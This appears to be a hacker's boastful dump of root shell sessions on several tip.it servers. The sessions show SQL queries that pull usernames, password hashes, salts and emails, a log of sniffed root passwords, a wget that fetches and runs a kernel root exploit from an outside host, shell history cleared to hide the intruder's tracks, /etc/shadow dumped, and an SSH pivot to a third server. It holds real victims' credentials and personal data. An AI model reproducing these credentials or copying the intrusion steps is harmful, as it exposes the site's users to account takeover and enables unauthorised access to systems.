drwx------  2 mysql mysql       4096 Jun 18  2008 zenit
[root@web01 bulat]# cd /var/www/html
[root@web01 html]# ls -la
total 711004
drwxr-xr-x 20 root      root        4096 Oct 11 07:45 .
drwxr-xr-x 21 root      root        4096 Jun 28 09:06 ..
drwxrwxr-x 13 root      apache      4096 Sep 24 16:25 adds
-rw-rw-r--  1 eira      eira         499 Dec 20  2003 back.JPG
-rw-r--r--  1 root      root       14427 Aug 31  2007 cal2.html
-rw-r--r--  1 root      root       14427 Aug 31  2007 cal.html
drwxr-xr-x  3 eira      eira        4096 Jan 16  2007 common
drwxr-xr-x  3 eira      eira        4096 Feb  8  2005 daoc
drwxr-xr-x  4 eira      eira        4096 Jul 10  2008 eira
drwxr-xr-x  7 eira      eira        4096 Aug 19  2008 error_404
-rw-r--r--  1 eira      eira        2274 Dec 21  2003 favicon.ico
drwxr-xr-x  3 root      root        4096 Aug 20  2008 gladiatus
-rw-r--r--  1 root      root           0 Dec 25  2006 google13ce76cda5634bd5.html
drwxr-xr-x  4 eira      eira        4096 Jan 30  2006 img
-rw-rw-r--  1 eira      eira        1507 Jun 22  2004 index.html
-rw-r--r--  1 root      root    14553577 Oct 11 07:51 phpbb_users.txt
-rw-r--r--  1 root      root          16 Mar 25  2005 phpinfo_x.php
-rw-r--r--  1 root      root           0 Sep 21  2007 robots.txt
-rw-r--r--  1 root      root        1548 Jan 16  2007 robots.txt-old
drwxrwxr-x 13 eira      apache      4096 Oct  3  2010 rsc
drwxrwxr-x 31 eira      apache      4096 Oct  7 00:59 runescape
drwxr-xr-x  9 root      root        4096 Sep 24  2007 silks
-rw-rw-r--  1 eira      eira       15698 Dec 20  2003 Silverion.jpg
-rw-r--r--  1 root      root      141686 Jun  6  2007 sitemap2.xml
-rw-r--r--  1 root      root       15276 Jun  6  2007 sitemap.xml
drwxr-xr-x  2 root      root        4096 Mar 28  2005 stats
-rw-rw-r--  1 eira      eira       34462 Jun 22  2004 tipitlayout1c.jpg
drwxr-xr-x  2 webalizer root        4096 Jul  1  2005 usage
drwxr-xr-x  5 eira      eira        4096 Sep 26 06:27 vela
-rw-r--r--  1 root      root   114052870 Jun 24 01:41 vela.tar.gz
drwxr-xr-x  3 eira      eira        4096 Aug  9  2007 vocegiuliana
drwxr-xr-x  2 eira      eira        4096 Aug  9  2007 volantini
drwxr-xr-x  3 eira      eira        4096 Jun  9  2008 wizard
-rw-r--r--  1 root      root         127 Jan 15  2007 y_key_56098cca870c821d.html
drwxr-xr-x  2 root      root        4096 Jun 24 09:34 zenit
drwxr-xr-x 10 eira      eira        4096 Jun 24 01:08 zenit-with-holes
-rw-r--r--  1 root      root   598370689 Jun 24 01:44 zenit.zip
[root@web01 html]# cd adds
[root@web01 adds]# ls -al
total 208
drwxrwxr-x 13 root  apache  4096 Sep 24 16:25 .
drwxr-xr-x 20 root  root    4096 Oct 11 07:45 ..
-rw-rw-r--  1 root  apache  2308 Apr 29  2006 activation.old.php
-rw-rw-r--  1 peter peter   2846 Sep 14  2008 activation.php
drwxrwxr-x  2 root  apache  4096 Apr 17 21:03 areas
drwxrwxr-x  2 root  apache  4096 Jun 15  2008 backup
-rw-rw-r--  1 root  apache   580 Apr 25  2006 backup.php
-rw-rw-r--  1 root  apache  1002 Jan  4  2007 comparereqs.php
-rw-rw-r--  1 peter peter  15124 Jul 21  2008 contactsubmits.php
-rw-rw-r--  1 peter peter    473 Jul 21  2008 contactuspopup.php
-rw-rw-r--  1 peter peter    961 Jul 23  2008 download.php
drwxrwxrwx  6 root  apache  4096 Dec 20  2009 files
drwxrwxr-x  3 root  apache  4096 Oct  3  2010 functions
drwxrwxr-x  2 root  apache  4096 Jun 15  2008 handlers
-rw-rw-r--  1 peter peter    421 Sep 14  2008 hosttest.php
drwxrwxr-x  2 root  apache  4096 Sep 14  2008 includes
-rw-rw-r--  1 root  apache 25247 May 20 14:34 index.php
-rw-rw-r--  1 root  apache   130 Sep 24 16:50 info.php
-rw-rw-r--  1 peter peter  12110 Jun 12 14:59 itempopup_search.php
drwxrwxr-x  4 peter peter   4096 Jun 12 14:58 js
-rw-rw-r--  1 root  apache   397 Apr 25  2006 keepalive.php
-rw-rw-r--  1 root  apache  4454 Apr 28  2006 login.old.php
-rw-rw-r--  1 peter peter  10348 Jan 26  2011 login.php
drwxrwxr-x  8 root  apache  4096 Jun 15  2008 map_team
-rw-rw-r--  1 root  apache  2270 May 30  2006 previewtimes.php
drwxrwxr-x  5 root  apache  4096 Apr  2  2011 styles
drwxrwxr-x  2 root  apache  4096 Jun 15  2008 tmp
drwxrwxr-x  2 root  apache  4096 Sep 24 16:50 transfer
-rw-rw-r--  1 root  apache   533 Apr 25  2006 userguide_coders.php
-rw-rw-r--  1 root  apache 28370 Jul 16  2009 userguide.php
-rw-rw-r--  1 root  apache  4889 Apr 25  2006 userguidepopup.php
[root@web01 adds]# head -n010 login.php

*------------------------------------------------------------------------------
*/

session_start();
[root@web01 adds]# head -n100 login.php

*------------------------------------------------------------------------------
*/

session_start();

//include stuff
include('functions/db_connect_guides.php');
require_once('functions/admin.php');
ini_set('error_reporting', E_ALL);

function prepareinput($array)
{
  foreach($array as $key => $value)
  {
    if (!is_array($array[$key]))
    {
      $value = stripslashes($value);
   $value = mysql_real_escape_string($value);
   $array[$key] = $value;
    }
  }
  return $array;
}

prepareinput($_POST);
function login($msg, $disable, $user)
 {
  $disabled = '';
  if($disable == 'true')
     {
        $disabled = ' disabled';
     }
  print '


Restricted Area :: '.$msg.'




Restricted Area :: '.$msg.'
Username
Password
Remember you?
'; } if(!isset($_SESSION['count'])) { $_SESSION['count'] = 0; } if ($_SESSION['count'] > 3) { login('Too many incorrect logins', 'true'); exit(); } if(isset($_GET['logout'])) { if(isset($_COOKIE['session_info']) || isset($_COOKIE['session_info_id'])) { setcookie("session_info", "", time()-60*60*24*100, "/"); setcookie("session_info_id", "", time()-60*60*24*100, "/"); } if(isset($_SESSION['session_info'])) { [root@web01 adds]# cat functions/db_connect_guides.php [root@web01 adds]# cd .. [root@web01 html]# ls -al total 716824 drwxr-xr-x 20 root root 4096 Oct 11 07:45 . drwxr-xr-x 21 root root 4096 Jun 28 09:06 .. drwxrwxr-x 13 root apache 4096 Oct 11 07:53 adds -rw-rw-r-- 1 eira eira 499 Dec 20 2003 back.JPG -rw-r--r-- 1 root root 14427 Aug 31 2007 cal2.html -rw-r--r-- 1 root root 14427 Aug 31 2007 cal.html drwxr-xr-x 3 eira eira 4096 Jan 16 2007 common drwxr-xr-x 3 eira eira 4096 Feb 8 2005 daoc drwxr-xr-x 4 eira eira 4096 Jul 10 2008 eira drwxr-xr-x 7 eira eira 4096 Aug 19 2008 error_404 -rw-r--r-- 1 eira eira 2274 Dec 21 2003 favicon.ico drwxr-xr-x 3 root root 4096 Aug 20 2008 gladiatus -rw-r--r-- 1 root root 0 Dec 25 2006 google13ce76cda5634bd5.html drwxr-xr-x 4 eira eira 4096 Jan 30 2006 img -rw-rw-r-- 1 eira eira 1507 Jun 22 2004 index.html -rw-r--r-- 1 root root 20509161 Oct 11 07:54 phpbb_users.txt -rw-r--r-- 1 root root 16 Mar 25 2005 phpinfo_x.php -rw-r--r-- 1 root root 0 Sep 21 2007 robots.txt -rw-r--r-- 1 root root 1548 Jan 16 2007 robots.txt-old drwxrwxr-x 13 eira apache 4096 Oct 3 2010 rsc drwxrwxr-x 31 eira apache 4096 Oct 7 00:59 runescape drwxr-xr-x 9 root root 4096 Sep 24 2007 silks -rw-rw-r-- 1 eira eira 15698 Dec 20 2003 Silverion.jpg -rw-r--r-- 1 root root 141686 Jun 6 2007 sitemap2.xml -rw-r--r-- 1 root root 15276 Jun 6 2007 sitemap.xml drwxr-xr-x 2 root root 4096 Mar 28 2005 stats -rw-rw-r-- 1 eira eira 34462 Jun 22 2004 tipitlayout1c.jpg drwxr-xr-x 2 webalizer root 4096 Jul 1 2005 usage drwxr-xr-x 5 eira eira 4096 Sep 26 06:27 vela -rw-r--r-- 1 root root 114052870 Jun 24 01:41 vela.tar.gz drwxr-xr-x 3 eira eira 4096 Aug 9 2007 vocegiuliana drwxr-xr-x 2 eira eira 4096 Aug 9 2007 volantini drwxr-xr-x 3 eira eira 4096 Jun 9 2008 wizard -rw-r--r-- 1 root root 127 Jan 15 2007 y_key_56098cca870c821d.html drwxr-xr-x 2 root root 4096 Jun 24 09:34 zenit drwxr-xr-x 10 eira eira 4096 Jun 24 01:08 zenit-with-holes -rw-r--r-- 1 root root 598370689 Jun 24 01:44 zenit.zip mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | lotro | | runescape | | war | +--------------------+ 4 rows in set (0.00 sec) mysql> show tables; +---------------------------+ | Tables_in_runescape | +---------------------------+ | adds_approvals | | adds_auth | | adds_categories | | adds_images | | adds_ip | | adds_log | | adds_sessions | | adds_uploads | | adds_users | | members | | rs2_atlas | | rs2_calculators | | rs2_calculators_arrays | | rs2_citadel | | rs2_citadel_slot | | rs2_clanlist | | rs2_clans_news | | rs2_clans_pages | | rs2_construction | | rs2_contactus | | rs2_diversion_locations | | rs2_diversion_pair | | rs2_diversion_week | | rs2_dynamic_approve | | rs2_dynamic_bans | | rs2_dynamic_log | | rs2_dynamic_statcache | | rs2_events | | rs2_events_comments | | rs2_events_scores | | rs2_events_scores_players | | rs2_events_scores_year | | rs2_events_teams | | rs2_featured | | rs2_gecache | | rs2_genames | | rs2_gerecords | | rs2_getimes | | rs2_guides | | rs2_hitscheck | | rs2_microhelper | | rs2_monster | | rs2_monster_attacks | | rs2_monster_groups | | rs2_monster_items | | rs2_monster_reports | | rs2_news | | rs2_pages | | rs2_poll | | rs2_poll2 | | rs2_poll2_answers | | rs2_poll2_votes | | rs2_poll_results | | rs2_poll_votes | | rs2_quest | | rs2_quest_draft | | rs2_quest_pages | | rs2_quest_reports | | rs2_quest_req | | rs2_races | | rs2_report_ban | | rs2_report_flood | | rs2_subquests | | rs2_summon | | rs2_times | | rs2_times_dategroups | | rs2item | | rs2item_categories | | rs2item_group_items | | rs2item_groups | | rs2item_reports | | rs2item_stats | | rs2item_subcat | | rs2shops | | rs2shops_city | | rs2shops_currency | | rs2shops_kingdom | | rs2shops_report | | rs2shops_reportstock | | rs2shops_stock | | rs2shops_type | | rsc_bestiary | | staff_position | | staff_users | +---------------------------+ 84 rows in set (0.00 sec) mysql> select concat_ws(0x3a,user_name,password,salt) from adds_users; ERROR 2006 (HY000): MySQL server has gone away No connection. Trying to reconnect... Connection id: 11415326 Current database: runescape +----------------------------------------------------------+ | concat_ws(0x3a,user_name,password,salt) | +----------------------------------------------------------+ | Silverion:reset:1f8a04f00 | | SerpentEye:17da56625f34972c22f117899a5d0b15:7505d9618 | | pokemama:88d5ef7cb02d4505d4f8e65ec597fbd6:a2d14e70e | | Neminon:e471395f84f7a7a35d246f9f7160ad72: | | boomer12342:f29f9860bda0f8b859dd23268ecc7297:8dfcee96f | | Vhellcat:c701886bf870bcdc805f76b5fd374dc7:08bf200db | | TecMaster532:cd06d27dd29ccbd6e07696da9c60b723:3cfea708e | | tripsis:61e375455c3098a8eb025509b0c01ce2:a6540538c | | Siobhana:9cba134889178fab200681778ed64bc7:07aa5e9a6 | | Cowman_Alt:64e77b28db2690a3f634f2b0bf6cfcd4:a5f45f4ff | | Jafje:ff34beeb4b3ca02f56c0220f55cff497:d877c37b1 | | BloodAngel:d98a9d8f98897615a6d9d7564e5ff96a:270972c7e | | Speedyshel:f84faf4a6559b31970a5a9011d23834a:cc18e9930 | | Octarine19:7c36cce68f9638084e1a9e59bcc35049:bd4fbd2b5 | | ForsakenMage:ada76cc2ab885d5f7279e80922d7a71d:e45a31d57 | | RussetAlpha:b487ad58bbf037f95e71233e715a5dad:53a7ec27a | | Cruiser:a5dfbc4b586c7c4cafa22f2ad0ee5b96:1d553218b | | odd:f8ff8c31ba125143553ec938e5b12d20:61ca14d4a | | Peter:951089f4243b3d8a6f3594c93044e760:3e53bd8f5 | | Howlin0001:68330b7b8312607a2bfe8c9c19871b91:35dea8edb | | Cowman_133:299aaa335c3a495bbf3d1cafd058f5cd:9675427ce | | Wyvren2000:705388e025c0a735fc1da8db7e712c2b:6c073222b | | Omnitec:reset:3ec004ab3 | | Neglexis:2ebad4e50ce6f35a8475dbee4e56eb96:e38cd9ef9 | | All Bogs:9654c5c25c0c8ef1a388a72752838789:7a8173c33 | | SupaDavis:ef62d3d94a47a37b7da6fddc57f8ad8c:b709c0781 | | Warriormonkx:8a062a10beaba882dcd3df5e8c7bee02:dcf7f7c69 | | Y_Guy:7acbe93c2fe874ce0ed3ae41e08f3459:4a223174a | | Wisse:a193694d7c0b81fef013981c9b4e6f28:ef42c869d | | Quyneax:bac515af1da4bfaaad2784252d486437:072df5de1 | | Georgelemmons:a62aa37c706d7b771248c482a5967f1d:0ddb6568e | | Racheya:016ae44475e45249916f8b95dd86d01c:2f88b1ecb | | thiesje:cdcfdc5b16348885ea7463faf28b9bf5:8c6fa1bd7 | | Rien_Adelric:0d8151822c4c0969a0055301c162221b:8fd0c8e29 | | Mil:e7a650a25af5937e73c7f49a229a6f6b:51fde375f | | Xena_Dragon:934151f9705764bf2210525929df0d71:b3cc89564 | | Salleh:2ea800dd6342b4c5c1b0c8feaed1d9b9:ba42b9413 | | Dudecrush8:9a97271a9fbc5cdc946f92baa8ee34e8:6cb5adb7e | | Shelby_Polo:2f58410c5ed973d69b4ba033616788ba:426bc7a2c | | Rainy_Day:303096af8ea595fd0107324785ab25b8:b2dc94661 | | Aurhora:9592eda4def55c8039a05b5ed3c774f9:66cdecae4 | | qloque:846239db337c953829c787f0942c170e:254287237 | | RobocopIsWin:e4866132c88592ece4ac96ef18df5aa9:346f55d94 | | Alaz:538c7ae1ad111f526333891211e1a4c0:8d22758d6 | | Woofumz:63472704bdf216b612a2da024726958a:af48fb8b4 | | jimmy_jim:reset:415d8a35d | | Evaluate:a95f91b0f1aa28dd4407885c6ed41bf1:9f3e31d31 | +----------------------------------------------------------+ And now...just for lulz, we sniffed da root passwordz [root@web01 bulat]# cat /root/.bdlogs login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: root:WBSCt92b login in: beta:xUFru6ra5raF login in: beta:xUFru6ra5raF login in: root:WBSCt92b login in: root:WBSCt92b login at: 208.43.229.199 bulat: login at: 208.43.229.199 bulat: ^That makes one box, NOW FOR DA NEXT!@#$#$%^&&**((@(@(@))))@)@)@)@)#)#)#)#)#)#)##)#)#)#)#)#)#)#)#)#0 [bulat@forumx ~]$ [bulat@forumx ~]$ wget niqqaz.rs/0dayhidden -O tr1p >> /dev/null [bulat@forumx ~]$ ./tr1p Enter b1tch key: *************** [+] Tr1p/SSDTX local root exploit by g4yh1tl3r [+] Resolved commit_creds to ffffffff81062417 [+] Resolved prepare_kernel_cred to ffffffff810622f8 [+] Us1ng 1dt b1tch br34k [+] Preparing underflow payload [+] Mapped ZERO PAGE! [root@forumx ~]# export HISTFILE=/dev/null [root@forumx ~]# uname -a; id Linux forumx.tip.it 2.6.30.10-105.2.23.fc11.x86_64 #1 SMP Thu Feb 11 07:06:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [root@forumx ~]# last -a |less root tty1 Tue Oct 11 07:42 gone - no logout reboot system boot Tue Oct 11 07:23 (00:45) 2.6.30.10-105.2.23.fc11.x86_64 peter pts/0 Tue Oct 11 05:23 - down (01:56) stu8fa4.kent.ac.uk reboot system boot Mon Oct 10 09:42 (21:37) 2.6.30.10-105.2.23.fc11.x86_64 peter pts/1 Sun Oct 9 18:57 - 19:21 (00:24) stu8fa4.kent.ac.uk root pts/1 Mon Oct 3 10:38 - 11:27 (00:48) 188-230-152-15.dynamic.t-2.net peter pts/2 Sun Oct 2 08:04 - 09:15 (01:11) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com root pts/1 Sun Oct 2 08:04 - 00:46 (16:42) 188-230-152-15.dynamic.t-2.net root pts/1 Fri Sep 30 01:24 - 08:24 (06:59) bsn-176-196-23.dial-up.dsl.siol.net peter pts/1 Thu Sep 29 07:29 - 08:53 (01:23) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com root pts/1 Tue Sep 27 02:23 - 04:31 (02:07) 188-230-152-15.dynamic.t-2.net root pts/2 Mon Sep 26 15:07 - 22:06 (06:59) 188-230-152-15.dynamic.t-2.net peter pts/1 Mon Sep 26 14:27 - 16:33 (02:05) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com [root@forumx ~]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkituser:x:87:87:PolicyKit:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:499:498:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin backuppc:x:497:496::/var/lib/BackupPC:/usr/bin/nologin torrent:x:496:495:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin bulat:x:500:500::/home/bulat:/bin/bash lighttpd:x:495:490:lighttpd web server:/var/www/lighttpd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin avahi-autoipd:x:494:489:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin peter:x:501:48::/home/peter:/bin/bash teamspeak:x:502:502::/home/teamspeak:/bin/bash rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin unbound:x:493:488:Unbound DNS resolver:/etc/unbound:/sbin/nologin pulse:x:492:487:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin sphinx:x:491:484:Sphinx Search:/var/lib/sphinx:/bin/bash clamav:x:490:483:Clamav database update user:/var/lib/clamav:/sbin/nologin [root@forumx ~]# cat /etc/shadow root:$1$YrhwGJ9V$KQHuSZO40Bp0svjl/KxoY0:15258:0:99999:7::: bin:*:14115:0:99999:7::: daemon:*:14115:0:99999:7::: adm:*:14115:0:99999:7::: lp:*:14115:0:99999:7::: sync:*:14115:0:99999:7::: shutdown:*:14115:0:99999:7::: halt:*:14115:0:99999:7::: mail:*:14115:0:99999:7::: news:*:14115:0:99999:7::: uucp:*:14115:0:99999:7::: operator:*:14115:0:99999:7::: games:*:14115:0:99999:7::: gopher:*:14115:0:99999:7::: ftp:*:14115:0:99999:7::: nobody:*:14115:0:99999:7::: nscd:!!:14115:0:99999:7::: vcsa:!!:14115:0:99999:7::: distcache:!!:14115:0:99999:7::: tcpdump:!!:14115:0:99999:7::: rpm:!!:14115:0:99999:7::: ntp:!!:14115:0:99999:7::: squid:!!:14115:0:99999:7::: dbus:!!:14115:0:99999:7::: polkituser:!!:14115:0:99999:7::: apache:!!:14115:0:99999:7::: avahi:!!:14115:0:99999:7::: openvpn:!!:14115:0:99999:7::: named:!!:14115:0:99999:7::: rpcuser:!!:14115:0:99999:7::: nfsnobody:!!:14115:0:99999:7::: mailnull:!!:14115:0:99999:7::: smmsp:!!:14115:0:99999:7::: sshd:!!:14115:0:99999:7::: webalizer:!!:14115:0:99999:7::: dovecot:!!:14115:0:99999:7::: backuppc:!!:14115:0:99999:7::: torrent:!!:14115:0:99999:7::: haldaemon:!!:14115:0:99999:7::: mysql:!!:14116:::::: xfs:!!:14119:::::: bulat:$1$ZgjnuDTq$zwXg5PW4oa5ZK5ETOyIMp0:14119:0:99999:7::: lighttpd:!!:14142:::::: postfix:!!:14142:::::: avahi-autoipd:!!:14154:::::: peter:$1$8DGBPy.f$57BMYWsBl4VyMnwnJqKKV0:15196:0:99999:7::: teamspeak:$1$yb1s1A.E$KrNgLaB9qTZvI5Sv8kgnr/:14230:0:99999:7::: rpc:!!:14722:0:99999:7::: oprofile:!!:14722:::::: unbound:!!:14817:::::: pulse:!!:14817:::::: sphinx:!!:14817:::::: clamav:!!:15149:::::: [root@forumx html]# ls -al total 36 drwxr-xr-x. 5 root root 4096 2010-08-18 15:20 . drwxr-xr-x. 9 root root 4096 2010-04-06 17:31 .. drwxr-xr-x 15 peter apache 4096 2011-10-11 06:07 forum.tip.it -rw-r--r-- 1 root root 202 2008-07-12 20:50 index.html -rw-r--r-- 1 root root 746 2008-06-05 13:51 index.html.bak drwxr-xr-x 11 root root 4096 2008-06-14 10:39 lotro.tip.it drwxrwxrwx 12 root root 4096 2008-06-14 10:39 nosf.tip.it [root@forumx html]# cd forum.tip.it [root@forumx forum.tip.it]# cat conf_global.php Some more lulz- mysql> select concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) from members limit 0,100; ERROR 2006 (HY000): MySQL server has gone away No connection. Trying to reconnect... Connection id: 8246 Current database: forum2009 +-----------------------------------------------------------------------------------+ | concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) | +-----------------------------------------------------------------------------------+ | ipstech:811743d8d526fc93ebccc21868b5dc01:p2juR:0 | | raenond:a51db4af185443c9eda7959bbc1db46b:|Xx@^ | | newptor:7dbe3455cbe75ccaf323f0fdc60c343c::1 | | forsakenmage:b16c211fd7ece57d27a26a6b3af2dc6f::0 | | ma6bi0ahk:5da6d54b3a62471dca4b9149fffea480:2RfQJ | | grornemow:e8ae9223c7e9d10732696e944f170339:r&rxP | | stephenpope95:de999ecfb8bd7a324a21c14c17eafc40:y>;{N | | snowstorm:a4d4a28ac7555cc63dabf97a4a6bf859:&#}7C | | pyro:: | | greatsilverwyrm:ec3cce8f7202359d5736747033764d31: | | tsai:: | | ladysarafina:: | | lightning:816480113af7100424d2f25a362c559d:bU^Oi | | exarch:: | | mage_burner:f79b3d203951b862c4b8b6da4abfcac2:O#8ZG | | ks_jeppe:: | | sunli:c49b237e7c06fc7dcb9f74e535329289::0 | | eeeeediot:623289da6a24f789119314ea84468a5c:y*+y1 | | nathaninch:c9768daf5bf630888a1b8089467ccfdc::0 | | fat_slug:a6c56934e826c1a4e024e7fb8792a2fc:?o70?:0 | | swamp_cat:: | | deadman_andy:: | | spencerm98:: | | tomato:8efa60748b553eef472ae9f2c18c559a: | | swifty_mcvae:: | | the_sith:41cbdb3a5812fbb4bbea15fdbe860783: | | misplacedme:5ccd22ceef73abf706205231926b99ad:idmSP:0 | | red_tanya:481b5be84b6fdf41209287e5b4ecbd9f:>7kSW:0 | | ryl:: | | meesy:: | | grin_king:: | | runegirlie:725f06fee6d8ae7a16907dba70f7970a: | | wistan:: | | weezcake:6dbc57cc53dfd9a55169d2a3e45cf2df: | | dusqi:853606dbc6d91e2d9c3150d18c7d3d7b: | | silverion:86038e207109d75b5d4ca3fed3f77515:N!}v;:0 | | troydosdos:26adab7d89084975f19f4726feba94df:Lg4/O | | leon_art:8401deaafc1e650873141fb288148e8c:Zyauw | | wmathewphelpsr:0c7f31c983ff159a2df84f8b18653099:.SvI} | | thunder:: | | bobdabuilda:: | | sunspeak:15da5ede7bd58b954d20ff3fa5a8c00e:M*T;` | | rease:5a23d8c8d72eb409b676224e478c3fc8:h.UBm | | militaris:109bff6a3dd1ca020dfa8403a156c709:44.%z | | cameron:: | | swtkittn:dbd1975e4055c1cd36e0e1acae1928c8: | | centuramage:: | | zidanect:3ea3599bff9d19a9fea14a750d82555a::0 | | chicken:: | | insane:34aa5866c803ab64fc2b43ff7897a402: | | dromaruk:: | | usara:72fc5241b75e9ee7a1dabd793cebf3fd:z|Ybh | | gumby:: | | herr:: | | lageris89:: | | mideea:: | | cruiser:59fec7c72e4b9b14446101618d06cb10: | | leylen:577fa11e45922b41b2e67c373b1a9047: | | rpg_pro:62de274e1926c5640fed496626d3cf81:R/Un# | | sidewinder:: | | tomiz:: | | punk4ever:: | | jammy316:: | | sandytrain:: | | netbent:: | | cellkiller20:11d74d43fbca17192a3b18cb56c0ea66:[zEE' | | craven_image:1f99956e517d2bdb9edd2ab95ba1d666:u(-LT | | emp:: | | lord9000:: | | kylepetty:: | | smoressoccer:a01d93f665bf6cb96dd7c2a907a08f42: | | paul:: | | mystical25:: | | phunk:: | | andrew:: | | the_pure12:: | | 2cansamyboy:: | | pepsi16:: | | godofend:: | | coolhaz7000:: | | bluetear:2b3ffba93ff4ff5bf913d3cd32dc1a8d: | | phil:18d40b67a951ffd2111600af162e4204: | | sneakydiva:: | | xxxxthugxxxx:: | | lord:: | | annie:: | | pker_dude_jr:49362d81bd5318dacf86ea4f0477f9f1: | | juha_itse:: | | matt:: | | nik:: | | blue107:a5085415200c7ef8da98b59e4834b819: | | greenminer:1d9704bfc517f297a06e2cb62102a3cb: | | ex1le:: | | gathra:526a36f262203f006b73913bdec4ef1f:|jJIm | | moridin:599e4766740f874be5076cca7b9215d8:ybg`l | | _kinslayer_:: | | psycho:: | | ultrasmasher:f7e0a2681c4f46f649ff00e37d3d14dd: | | sin_q:: | | anonimouse69:: | +-----------------------------------------------------------------------------------+ 100 rows in set (0.13 sec) --NEXT BOX [root@forumx bulat]# ssh gaspez-arts.com -lroot The authenticity of host 'gaspez-arts.com (66.36.248.197)' can't be established. RSA key fingerprint is 58:7c:8e:2b:1c:80:41:ad:15:65:98:72:31:3a:48:8e. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'gaspez-arts.com,66.36.248.197' (RSA) to the list of known hosts. root@gaspez-arts.com's password: Last login: Fri Sep 30 13:33:04 2011 from 188-230-152-15.dynamic.t-2.net [root@mail ~]# uname -a;id Linux mail.tip.it 2.6.23.17-88.fc7 #1 SMP Thu May 15 00:35:10 EDT 2008 i686 i686 i386 GNU/Linux uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [root@mail arena_test]# last -a eira pts/0 Mon Oct 10 04:53 - 07:06 (02:12) 95.233.233.42 eira pts/0 Sat Oct 8 01:22 - 03:37 (02:14) host17-203-dynamic.58-82-r.retail.telecomitalia.it eira pts/1 Thu Oct 6 03:26 - 05:43 (02:17) host46-171-dynamic.56-82-r.retail.telecomitalia.it [root@mail eira]# cat .bash_history | tail ls -al exit cd /etc/httpd/conf.d ls -al su cd /etc/httpd/conf.d su w cd /etc/httpd/conf.d su [root@mail ~]# ls -la /var/www total 16656 drwxr-xr-x 36 root root 4096 2011-06-23 02:56 . drwxr-xr-x 25 root root 4096 2007-10-19 10:20 .. drwxr-xr-x 12 eira eira 4096 2008-08-31 11:00 arena drwxr-xr-x 10 eira eira 4096 2006-10-27 05:01 arena_old drwxr-xr-x 5 eira eira 4096 2011-08-01 07:29 arredareinsieme drwxr-xr-x 17 eira eira 4096 2009-11-30 18:16 asquinimobili drwxr-xr-x 3 eira eira 4096 2010-07-06 11:23 atc drwxr-xr-x 11 eira eira 4096 2010-03-29 16:07 cetekor drwxr-xr-x 2 eira eira 4096 2010-03-19 11:40 cetekor_mom drwxr-xr-x 2 root root 4096 2008-01-24 10:45 cgi-bin drwxr-xr-x 7 eira eira 4096 2011-06-13 10:10 common drwxr-xr-x 9 eira eira 4096 2009-03-29 07:01 control_panel drwxr-xr-x 2 eira eira 4096 2011-06-13 10:09 dompdf drwxr-xr-x 2 eira eira 4096 2008-08-26 12:17 easygadget drwxr-xr-x 11 eira eira 4096 2011-07-07 02:56 ecolo drwxr-xr-x 25 eira eira 4096 2011-06-07 03:18 eira drwxr-xr-x 7 eira eira 4096 2009-04-22 06:45 erboristeria drwxr-xr-x 3 root root 4096 2008-03-14 07:48 error drwxr-xr-x 3 root root 4096 2008-01-24 10:45 html 